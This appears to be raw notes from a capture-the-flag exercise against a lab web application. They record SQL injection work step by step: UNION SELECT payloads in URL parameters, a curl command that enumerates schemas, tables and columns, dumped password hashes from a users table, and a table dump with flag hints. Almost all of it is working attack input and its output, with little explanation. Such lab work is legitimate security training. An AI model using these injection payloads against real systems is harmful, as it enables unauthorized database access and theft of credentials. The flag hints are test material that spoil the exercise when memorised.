

http://10.11.200.162//?page=member&id=5%20UNION%20SELECT%20NULL,NULL&Submit=Submit

ID: 5 UNION SELECT NULL,NULL 
First name: Flag
Surname : GetThe

ID: 5 UNION SELECT NULL,NULL 
First name: 
Surname : 


----------------
> http://10.11.200.162/?page=member&id=5 UNION ALL SELECT CONCAT(0x716b786271,IFNULL(CAST(schema_name AS CHAR),0x20),0x71766a7071),NULL FROM INFORMATION_SCHEMA.SCHEMATA&Submit=Submit

ID: 5 UNION ALL SELECT CONCAT(0x716b786271,IFNULL(CAST(schema_name AS CHAR),0x20),0x71766a7071),NULL FROM INFORMATION_SCHEMA.SCHEMATA 
First name: Flag
Surname : GetThe

ID: 5 UNION ALL SELECT CONCAT(0x716b786271,IFNULL(CAST(schema_name AS CHAR),0x20),0x71766a7071),NULL FROM INFORMATION_SCHEMA.SCHEMATA 
First name: qkxbqinformation_schemaqvjpq
Surname : 

ID: 5 UNION ALL SELECT CONCAT(0x716b786271,IFNULL(CAST(schema_name AS CHAR),0x20),0x71766a7071),NULL FROM INFORMATION_SCHEMA.SCHEMATA 
First name: qkxbqMember_Brute_Forceqvjpq
Surname : 

ID: 5 UNION ALL SELECT CONCAT(0x716b786271,IFNULL(CAST(schema_name AS CHAR),0x20),0x71766a7071),NULL FROM INFORMATION_SCHEMA.SCHEMATA 
First name: qkxbqMember_Sql_Injectionqvjpq
Surname : 

ID: 5 UNION ALL SELECT CONCAT(0x716b786271,IFNULL(CAST(schema_name AS CHAR),0x20),0x71766a7071),NULL FROM INFORMATION_SCHEMA.SCHEMATA 
First name: qkxbqMember_guestbookqvjpq
Surname : 

ID: 5 UNION ALL SELECT CONCAT(0x716b786271,IFNULL(CAST(schema_name AS CHAR),0x20),0x71766a7071),NULL FROM INFORMATION_SCHEMA.SCHEMATA 
First name: qkxbqMember_imagesqvjpq
Surname : 

ID: 5 UNION ALL SELECT CONCAT(0x716b786271,IFNULL(CAST(schema_name AS CHAR),0x20),0x71766a7071),NULL FROM INFORMATION_SCHEMA.SCHEMATA 
First name: qkxbqMember_surveyqvjpq
Surname : 

--------------
curl "http://10.11.200.162/?page=member&id=5 UNION SELECT table_name,column_name from information_schema.COLUMNS --&Submit=Submit" |  sed  's/<br>/\n/g' | sed 's/<pre>/\n/g' | grep "name:\|Surname" 
[...]
Surname : IS_OLD
First name: INNODB_BUFFER_PAGE_LRU
Surname : FREE_PAGE_CLOCK
First name: db_default
Surname : id
First name: db_default
Surname : username
First name: db_default
Surname : password
First name: users
Surname : user_id
First name: users
Surname : first_name
First name: users
Surname : last_name
First name: users
Surname : town
First name: users
Surname : country
First name: users
Surname : planet
First name: users
Surname : Commentaire
First name: users
Surname : countersign
First name: guestbook
Surname : id_comment
First name: guestbook
Surname : comment
First name: guestbook
Surname : name
First name: list_images
Surname : id
First name: list_images
Surname : url
First name: list_images
Surname : title
First name: list_images
Surname : comment
First name: vote_dbs
Surname : id_vote




--------------------
> http://10.11.200.162/?page=member&id=5 UNION SELECT commentaire,countersign from Member_Sql_Injection.users &Submit=Submit

ID: 5 UNION SELECT commentaire,countersign from Member_Sql_Injection.users  
First name: Flag
Surname : GetThe

ID: 5 UNION SELECT commentaire,countersign from Member_Sql_Injection.users  
First name: Amerca !
Surname : 2b3366bcfd44f540e630d4dc2b9b06d9

ID: 5 UNION SELECT commentaire,countersign from Member_Sql_Injection.users  
First name: Ich spreche kein Deutsch.
Surname : 60e9032c586fb422e2c16dee6286cf10

ID: 5 UNION SELECT commentaire,countersign from Member_Sql_Injection.users  
First name: ????? ????????????? ?????????
Surname : e083b24a01c483437bcf4a9eea7c1b4d

ID: 5 UNION SELECT commentaire,countersign from Member_Sql_Injection.users  
First name: Decrypt this password -> then lower all the char. Sh256 on it and it's good !
Surname : 5ff9d0165b4f92b14994e5c685cdce28



Database: Member_images
Table: list_images
[6 entries]
+----+----------------------------------+-----------+-----------------------------------------------------------------------------------------------------------------------+
| id | url                              | title     | comment                                                                                                               |
+----+----------------------------------+-----------+-----------------------------------------------------------------------------------------------------------------------+
| 1  | https://www.nsa.org/img.jpg      | Nsa       | An image about the NSA !                                                                                              |
| 2  | https://www.42.fr/42.png         | 42 !      | There is a number..                                                                                                   |
| 3  | https://www.google.fr/google.png | Google    | Google it !                                                                                                           |
| 4  | https://www.obama.org/obama.jpg  | Obama     | Yes we can !                                                                                                          |
| 5  | borntosec.ddns.net/images.png    | Hack me ? | If you read this just use this md5 decode lowercase then sha256 to win this flag ! : 1928e8083cf461a51303633093573c46 |
| 6  | https://www.h4x0r3.0rg/tr0ll.png | tr00l     | Because why not ?                                                                                                     |
+----+----------------------------------+-----------+-----------------------------------------------------------------------------------------------------------------------+


